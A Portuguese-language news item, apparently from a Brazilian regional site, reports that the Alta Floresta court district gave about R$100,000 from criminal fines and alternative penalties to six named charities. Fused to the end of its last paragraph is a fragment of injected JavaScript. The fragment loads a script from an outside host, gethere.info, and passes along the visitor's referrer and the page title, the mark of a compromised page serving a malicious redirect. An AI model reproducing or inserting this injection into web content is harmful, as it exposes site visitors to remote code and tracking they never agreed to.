Capa / Em Destaque / Alta Floresta contempla entidades beneficentes

Alta Floresta contempla entidades beneficentes

alta-florestaAssessoria TJMT

A Comarca de Alta Floresta selecionou seis entidades beneficentes para receberem recursos arrecadados com a aplicação da pena de multa e de medidas alternativas. Os recursos foram arrecadados em pouco mais de um ano e somam cerca de R$ 100 mil.

Todas as entidades que foram escolhidas estão devidamente cadastradas e atenderam a todos os requisitos exigidos pelo Conselho Nacional de Justiça (CNJ) e também pela Corregedoria-Geral da Justiça de Mato Grosso. A formalidade é necessária, pois se tratam de recursos públicos.

As entidades contempladas são: Projeto Método Pedia Suit-APAE de Alta Floresta, Projeto APAE Carlinda; Projeto de Revitalização da Casa Lar dos Idosos Pedro Sierra Sanches, Projeto é possível ser feliz-Projeto furuto, Projeto IDESP-Instituto Desportivo Educacional e Social Presbiteriano e Projeto luz do saber.

As instituições beneficiadas têm projetos sociais que atendem pessoas carentes, quer sejam crianças, idosos ou dependentes químicos.

As verbas são provenientes da pena de prestação pecuniária e de medidas alternativas aplicadas pela Vara Criminal e também pelo Juizado Especial Criminal da Comarca de Alta Floresta. De acordo com o Código Penal, se preenchidos os requisitos legais, o réu condenado pode ser punido com a pena de multa, que consiste no pagamento de uma determinada quantia. Se o valor não for encaminhado à vitima ou aos dependentes, pode ser direcionado às entidades beneficentes, conforme art. 2º da resolução 154/2012 do CNJ.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top